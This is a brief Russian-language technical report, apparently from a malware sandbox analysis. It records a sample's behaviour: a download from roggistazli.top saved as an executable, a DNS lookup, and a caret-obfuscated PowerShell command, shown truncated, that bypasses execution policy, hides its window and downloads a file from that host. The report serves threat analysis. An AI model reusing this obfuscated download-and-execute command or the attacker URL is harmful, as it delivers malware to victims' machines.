Техническая информация
- http://roggistazli.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^W^E^rs^HElL.ExE -EXecut^IOn^POLI^CY byPaSS^ -nOpROfIl^E -^wi^nDOWS^t^Y^LE h^Id^DeN^ (N^ew-oBje^Ct s^yS^te^m^.N^e^t^.WE^BcL^I^eNT).^d^Ow^nLOaD^fIl^E^(^'http://roggistazli.to...
- DNS ASK ro###stazli.top
- '<SYSTEM32>\cmd.exe' /c "p^o^W^E^rs^HElL.ExE -EXecut^IOn^POLI^CY byPaSS^ -nOpROfIl^E -^wi^nDOWS^t^Y^LE h^Id^DeN^ (N^ew-oBje^Ct s^yS^te^m^.N^e^t^.WE^BcL^I^eNT).^d^Ow^nLOaD^fIl^E^(^'http://roggistazli.to...' (со скрытым окном)